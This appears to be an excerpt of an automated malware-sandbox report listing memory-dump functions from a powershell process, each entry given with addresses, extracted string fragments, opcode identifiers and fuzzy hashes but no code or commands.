                                                        • Source File: 00000003.00000002.2325203209.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_7d90000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b93baeb311ee90fba5c7c10139c20c9d67381d5e78efd9e8becc34846a554ddb
                                                        • Instruction ID: 367eb4903f03dde39ec44962e20dc7575c6ad1e13080ee417ae10f3798047e46
                                                        • Opcode Fuzzy Hash: b93baeb311ee90fba5c7c10139c20c9d67381d5e78efd9e8becc34846a554ddb
                                                        • Instruction Fuzzy Hash: D601F77630021B9FCF2459AEF400576FB9ADFC5222F18C03BD989C7641DA32D855C7A0
                                                        Function 04F12B63 Relevance: .0, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2292571741.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_4f10000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 018657d802f3446c209707eed0411bd105f1a72da97d23d3e804758a07ae71d8
                                                        • Instruction ID: a421fc0b9578b5933415cc5f223e10d148ab1f81b37e889e54935854d45c5099
                                                        • Opcode Fuzzy Hash: 018657d802f3446c209707eed0411bd105f1a72da97d23d3e804758a07ae71d8
                                                        • Instruction Fuzzy Hash: 7F0144B8B002159FCB00DF98D490AAEF771FF8D310B248199D95A9B361CA35AC438B50
                                                        Function 04F13546 Relevance: .0, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2292571741.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_4f10000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9a6252389ec84c7630691a17f338eddb1d93fee76a1773896ed035d9de0eb19e
                                                        • Instruction ID: 5cc0d68ab4ab79d2f49261ee08d1abca3ff7a246f412b5ddcad82c3135ec0ca8
                                                        • Opcode Fuzzy Hash: 9a6252389ec84c7630691a17f338eddb1d93fee76a1773896ed035d9de0eb19e
                                                        • Instruction Fuzzy Hash: 5DF0B235A001199FDB15CB9DD890AEEF7B1FF88324F248159E515A72A1C732A852CB60
                                                        Function 07D93104 Relevance: .0, Instructions: 26COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2325203209.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_7d90000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 03af0c40a88b989029d7528f8adea7c20318629740ea713cea0cc475e1e8169e
                                                        • Instruction ID: ff86eea5dbc4568460f004fe142106a5077ef96f0c9272bc62684aeab1b4c070
                                                        • Opcode Fuzzy Hash: 03af0c40a88b989029d7528f8adea7c20318629740ea713cea0cc475e1e8169e
                                                        • Instruction Fuzzy Hash: 26F0F87024A3C18FDB168B24C864A61FB72AB43210F29C1D6D0848F1A7C736894AC761

                                                        Non-executed Functions

                                                        Function 04F18870 Relevance: .1, Instructions: 73COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2292571741.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_4f10000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b51941559354ee8d582504151e7de7d0d70773e57eda0e80ac2bd7dea32fa7ab
                                                        • Instruction ID: 64f650d15a3e2c591d08ad417f5e5002ae52d74452871b26df6cc7322c1e3dcc
                                                        • Opcode Fuzzy Hash: b51941559354ee8d582504151e7de7d0d70773e57eda0e80ac2bd7dea32fa7ab
                                                        • Instruction Fuzzy Hash: 802155747006558FCB45DB39C8848AEBBF6FF8A60075044AAE442DBB71DA70ED04CBA0
                                                        Function 07D981C8 Relevance: 17.9, Strings: 14, Instructions: 402COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2325203209.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_7d90000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'fq$4'fq$tPfq$tPfq$$fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq
                                                        • API String ID: 0-2944139831
                                                        • Opcode ID: 34fd1850f8210822f1b3daede0e6690a6a57229bb239e6b72831fcd34e3a14b9
                                                        • Instruction ID: c857bb32f19abd49e2f03b9617319af4dd60502ec28e4ccb2d5d0bd46ad18221
                                                        • Opcode Fuzzy Hash: 34fd1850f8210822f1b3daede0e6690a6a57229bb239e6b72831fcd34e3a14b9
                                                        • Instruction Fuzzy Hash: 2DD137B1B0421A9FCF248FA9C45066BFBA6AFC7A10F14807AD945CB281DF36D845D7A1
                                                        Function 07D99590 Relevance: 14.2, Strings: 11, Instructions: 481COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2325203209.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_7d90000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'fq$4'fq$tPfq$tPfq$$fq$$fq$$fq$!l$!l$!l$!l
                                                        • API String ID: 0-2771896681
                                                        • Opcode ID: 4dcbf60c79fa91c3f6ce9a9d5691e90509e708527590115422a267a241f42874
                                                        • Instruction ID: 0860c70101746ec54452d13beee216182b520d410c797cee0c2f1a3b9476421e
                                                        • Opcode Fuzzy Hash: 4dcbf60c79fa91c3f6ce9a9d5691e90509e708527590115422a267a241f42874
                                                        • Instruction Fuzzy Hash: 51F137F2B042169FCF109B78846166AFBE6AFC6310F14807ED985DB651DB31EC85C7A1
                                                        Function 07D92440 Relevance: 12.8, Strings: 10, Instructions: 302COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2325203209.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_7d90000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'fq$4'fq$4'fq$4'fq$$fq$$fq$$fq$$fq$$fq$$fq
                                                        • API String ID: 0-1802041116
                                                        • Opcode ID: 98ff0f78845eb7c2cf1c42d14e10b44ad0b16ce46ff0af7cb0e2b3451666b674
                                                        • Instruction ID: 2f3752ab07470ada40e0207696ccb0e41de8761c649524f9b6d8a074dd8b57aa
                                                        • Opcode Fuzzy Hash: 98ff0f78845eb7c2cf1c42d14e10b44ad0b16ce46ff0af7cb0e2b3451666b674
                                                        • Instruction Fuzzy Hash: 18A178B1704206BFCF259A78D85067AFBA2BF82350F14807AD885DB691DF31EC81C7A1
                                                        Function 07D9D25A Relevance: 11.4, Strings: 9, Instructions: 197COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2325203209.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_7d90000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'fq$84)l$84)l$tPfq$tPfq$$fq$(lq$(lq$(lq
                                                        • API String ID: 0-1679672950
                                                        • Opcode ID: 037b26422ef34caeb380ed204225a83579d19e24572d232ab9599ec3574dbb0e
                                                        • Instruction ID: bc1c2189f5f3ed234eef20088f4171ce509c717284340b880e22b6e8f9be5998
                                                        • Opcode Fuzzy Hash: 037b26422ef34caeb380ed204225a83579d19e24572d232ab9599ec3574dbb0e
                                                        • Instruction Fuzzy Hash: D67191B0B01205EFDF24CE59C540BAAF7B3AF85715F1980B9E845AB295C771EC81CBA1
                                                        Function 07D91DB0 Relevance: 10.4, Strings: 8, Instructions: 388COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2325203209.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_7d90000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'fq$4'fq$4'fq$4'fq$t~yq$$fq$$fq$$fq
                                                        • API String ID: 0-1498645533
                                                        • Opcode ID: ed36f2f29b794516179cd4388b965be173960d780e3a19ce9dc75c86b7487ff7
                                                        • Instruction ID: 15b77f99c5be658e0963c92fd9088d7a7af02972b1f9b539c1f2fcf7b11fcec4
                                                        • Opcode Fuzzy Hash: ed36f2f29b794516179cd4388b965be173960d780e3a19ce9dc75c86b7487ff7
                                                        • Instruction Fuzzy Hash: 87C147B1B0021A9FCF149FB9885066BFBA6BFC5314F14807AD949DB241EF32D991C7A1
                                                        Function 07D9CEFC Relevance: 10.2, Strings: 8, Instructions: 164COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2325203209.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_7d90000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'fq$84)l$TQkq$TQkq$tPfq$$fq$$fq$$fq
                                                        • API String ID: 0-802307874
                                                        • Opcode ID: cb2078778aa425068c771d51befa708379cdcb44a1ac139eacd6903a8e10d6d4
                                                        • Instruction ID: c4d2be08c5e6a2e25566fe231475860bba73a5107dc6e4836154604b833714ff
                                                        • Opcode Fuzzy Hash: cb2078778aa425068c771d51befa708379cdcb44a1ac139eacd6903a8e10d6d4
                                                        • Instruction Fuzzy Hash: 4F51B0B1711206DFCF248E24C5447AAF7A3BF45351F1980BAE848AB291D775DD81CBB2
                                                        Function 07D9CF10 Relevance: 10.2, Strings: 8, Instructions: 153COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2325203209.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_7d90000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'fq$84)l$TQkq$TQkq$tPfq$$fq$$fq$$fq
                                                        • API String ID: 0-802307874
                                                        • Opcode ID: edd20dd69e1b725e767508dc7631d2c90ec53d8983b64760b52c0c7cac2f1ce3
                                                        • Instruction ID: 62010b2057f28c74c115436c2e855c2fa54abc647aacc137a31e6543f5416833
                                                        • Opcode Fuzzy Hash: edd20dd69e1b725e767508dc7631d2c90ec53d8983b64760b52c0c7cac2f1ce3
                                                        • Instruction Fuzzy Hash: 6C51CFB2711206EFCF24CE25C5047AAF7A3BB45351F59807AE848AB290D735DD81CBB2
                                                        Function 07D9C9C9 Relevance: 8.9, Strings: 7, Instructions: 160COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2325203209.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_7d90000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'fq$84)l$d%lq$d%lq$d%lq$tPfq$$fq
                                                        • API String ID: 0-3999580537
                                                        • Opcode ID: 054897823925c3cada3daa2a5ce814031f298fc53eea4cbbcd832be0a08f7789
                                                        • Instruction ID: 900bdb9e30abd03135fc0f7fcfefdd04f594cc28df115dc2bd9937c0efcf7729
                                                        • Opcode Fuzzy Hash: 054897823925c3cada3daa2a5ce814031f298fc53eea4cbbcd832be0a08f7789
                                                        • Instruction Fuzzy Hash: 2F51A2F1A202469FCF24CF24C590A6AFBB2AF89654F1594B5E8099B391D731ED40CBB1
                                                        Function 07D900F0 Relevance: 8.0, Strings: 6, Instructions: 458COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2325203209.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_7d90000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'fq$4'fq$XY+l$XY+l$tPfq$tPfq
                                                        • API String ID: 0-896728234
                                                        • Opcode ID: e62d13db3b7e63d9da8411f6d03aa6b5bd1e7a0ec018d8612f1c0dfd7936aa2d
                                                        • Instruction ID: f368320bf5ac8286da5618c68dda7770916dc515e9fcb597a7c19c62e1c72de2
                                                        • Opcode Fuzzy Hash: e62d13db3b7e63d9da8411f6d03aa6b5bd1e7a0ec018d8612f1c0dfd7936aa2d
                                                        • Instruction Fuzzy Hash: 8BE136F1B0421B9FCF108BB8A84166AFBA69FC6314F18C07BD945DB691DB31D881C7A1
                                                        Function 07D9D904 Relevance: 7.7, Strings: 6, Instructions: 193COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2325203209.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_7d90000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'fq$84)l$tPfq$$fq$$fq$$fq
                                                        • API String ID: 0-2772942862
                                                        • Opcode ID: 842a24143a744692375280a070014743606603a2af70708bbfaadada2cafcd70
                                                        • Instruction ID: 9a2f0d1cdf1ee44141a1f7ebc535584cf3b30e26cf87f7b4e48edd9b480e77f2
                                                        • Opcode Fuzzy Hash: 842a24143a744692375280a070014743606603a2af70708bbfaadada2cafcd70
                                                        • Instruction Fuzzy Hash: 3561B0F070420AEFDF248E59C6407BAFBB3AB45355F188075E845AB291C775EC90CBA1
                                                        Function 07D9D918 Relevance: 7.7, Strings: 6, Instructions: 185COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2325203209.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_7d90000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'fq$84)l$tPfq$$fq$$fq$$fq
                                                        • API String ID: 0-2772942862
                                                        • Opcode ID: eef4dbe9bb981d6b6194069e68ee07421bc3a5adc26ffe847d6beff8c3cd3c3f
                                                        • Instruction ID: 3d15b8a562660b5e093063ad35d59cef5f3e46fdfcd38cf463b7c843176f9b2d
                                                        • Opcode Fuzzy Hash: eef4dbe9bb981d6b6194069e68ee07421bc3a5adc26ffe847d6beff8c3cd3c3f
                                                        • Instruction Fuzzy Hash: 3D619FF070420AEFDF248E59C6407BAFBB7AB45355F188075E845AB290C7B5EC90CBA1
                                                        Function 07D9CB0E Relevance: 7.6, Strings: 6, Instructions: 85COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2325203209.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_7d90000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'fq$84)l$d%lq$d%lq$d%lq$tPfq
                                                        • API String ID: 0-4074559199
                                                        • Opcode ID: 3380b6041a13cd4ff8221b44362beb3499678fb3548a4c365c15be642e7ca2a8
                                                        • Instruction ID: 476cd3ae78e7f3157eabadb939c9719992c7b160748282e3ecc2170f526c4a51
                                                        • Opcode Fuzzy Hash: 3380b6041a13cd4ff8221b44362beb3499678fb3548a4c365c15be642e7ca2a8
                                                        • Instruction Fuzzy Hash: FD3152F1B10215AFCB14DF68C490A6AFFB2FB48714F159565E809AB341CB71EC41CBA1
                                                        Function 07D9DCE0 Relevance: 6.4, Strings: 5, Instructions: 115COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2325203209.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_7d90000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 84)l$XRkq$XRkq$tPfq$$fq
                                                        • API String ID: 0-2636575829
                                                        • Opcode ID: 7bc3aef290340249ce73f4e4089aa8cc842673370c76eae1482d103c0bde6b07
                                                        • Instruction ID: af90cb633b39c3f6e32d7e0d8c4e636f56daa1bcd213d2b86cbbb7b0d4211669
                                                        • Opcode Fuzzy Hash: 7bc3aef290340249ce73f4e4089aa8cc842673370c76eae1482d103c0bde6b07
                                                        • Instruction Fuzzy Hash: 07417CB1B00209DBCF289F49C544AAAF7F3AB85710F29C0B9E9446B295C731ED40CBA0
                                                        Function 07D981C3 Relevance: 6.4, Strings: 5, Instructions: 112COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2325203209.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_7d90000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'fq$tPfq$$fq$$fq$$fq
                                                        • API String ID: 0-3445244938
                                                        • Opcode ID: 0789ab102293365e25c3e4f29dccc8fb66f599e223c1f867a2f808e1f71b148d
                                                        • Instruction ID: 447592d90ae10d249560f98ec22fe03dd954565345ac26239e6ab6b9a127a883
                                                        • Opcode Fuzzy Hash: 0789ab102293365e25c3e4f29dccc8fb66f599e223c1f867a2f808e1f71b148d
                                                        • Instruction Fuzzy Hash: C441F5B1A00606EFDF24CE45C540BAAF7B2AF47B60F18C17AE955EB291D731D840EB91
                                                        Function 07D9B080 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2325203209.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_7d90000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $fq$$fq$$fq$!l$!l
                                                        • API String ID: 0-355449559
                                                        • Opcode ID: dd3cae4457a3fdca4e21f922cd11cd3f22f832a4e5d5f8e08106476acc3aa0fb
                                                        • Instruction ID: a8e19031c679a0b2511529e8c249cc5a68c40eae6beb8ba5e1002bee8d0b9495
                                                        • Opcode Fuzzy Hash: dd3cae4457a3fdca4e21f922cd11cd3f22f832a4e5d5f8e08106476acc3aa0fb
                                                        • Instruction Fuzzy Hash: D91126F131430A9BDF64596EE800F27F7ABABC2764F25813BE59C97280DA32C840C361
                                                        Function 07D9DF88 Relevance: 5.3, Strings: 4, Instructions: 299COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2325203209.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_7d90000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (f+l$(f+l$4'fq$4'fq
                                                        • API String ID: 0-4097845313
                                                        • Opcode ID: 4e09a681222d46d5179e0a6b0a3785a5e9fcc169a242f12f85de89aece25f2b1
                                                        • Instruction ID: bbd2995d141a5c5796ff667ecb715fdc7ade32b69a56af9aa0882a03a27c44de
                                                        • Opcode Fuzzy Hash: 4e09a681222d46d5179e0a6b0a3785a5e9fcc169a242f12f85de89aece25f2b1
                                                        • Instruction Fuzzy Hash: 3DC18EB5A00209DBCF24CF54C541BAEFBB2AF88704F148529E9457B785CB76EC81CB91
                                                        Function 07D94BB0 Relevance: 5.3, Strings: 4, Instructions: 279COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2325203209.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_7d90000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 84)l$84)l$tPfq$tPfq
                                                        • API String ID: 0-4080425432
                                                        • Opcode ID: 020022ad2d03f59287b7bcf814d4755a1e45533837fc5decceaea0a96cc94fec
                                                        • Instruction ID: 79de8a60ae89c7f710500635663f7973a2ac1f05d0a15e3fbace978ad5230990
                                                        • Opcode Fuzzy Hash: 020022ad2d03f59287b7bcf814d4755a1e45533837fc5decceaea0a96cc94fec
                                                        • Instruction Fuzzy Hash: 769137F17002869FCF149F69885066BFBA6AF85310F28C47AD945DB382CB31DC42C7A1
                                                        Function 07D97550 Relevance: 5.2, Strings: 4, Instructions: 192COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2325203209.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_7d90000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (f+l$(f+l$(f+l$(f+l
                                                        • API String ID: 0-2354121962
                                                        • Opcode ID: e3a5a1473d5c7c4ae710484e0a734aea3ac73fcd20f4f198457459fb016b5790
                                                        • Instruction ID: 5019bd7e146ffa10356247f8b4084c156b1ec756bfabf353cbb7b3bbf33011da
                                                        • Opcode Fuzzy Hash: e3a5a1473d5c7c4ae710484e0a734aea3ac73fcd20f4f198457459fb016b5790
                                                        • Instruction Fuzzy Hash: 1C7162B4E20109DFCB54CF68C491A6EFBB2AF89324F149069D805AB755DB71EC81CB91
                                                        Function 07D91C10 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2325203209.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_7d90000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $fq$$fq$$fq$$fq
                                                        • API String ID: 0-2113499236
                                                        • Opcode ID: e16ebdff2fda781296ccc5e299e5d56f303f25beda1d6fadbc4839042250fe96
                                                        • Instruction ID: f3521a60c029879ab001bcdfee074f8eb9021dacf5bdad8c17d3e3e9528547b9
                                                        • Opcode Fuzzy Hash: e16ebdff2fda781296ccc5e299e5d56f303f25beda1d6fadbc4839042250fe96
                                                        • Instruction Fuzzy Hash: 572144F171025F6BDF349A7E8881B27FA9A9BC1755F24803AA945CB381CE37C8818361
                                                        Function 07D91A91 Relevance: 5.1, Strings: 4, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2325203209.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_7d90000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'fq$4'fq$$fq$$fq
                                                        • API String ID: 0-2206495126
                                                        • Opcode ID: 62d6260c19dc2fd503243194b11ce9f5a531dfe21daf06d2d3f1a57bbb2e0c07
                                                        • Instruction ID: b0311841cfb4bece9d9f709d7cd963c0de93bafb54d19482bc1191f8aa444fc4
                                                        • Opcode Fuzzy Hash: 62d6260c19dc2fd503243194b11ce9f5a531dfe21daf06d2d3f1a57bbb2e0c07
                                                        • Instruction Fuzzy Hash: 3C01D86170A39B4FCB2746781821566BF775FC315072A00E7D485DF2A3DD568C4A83A3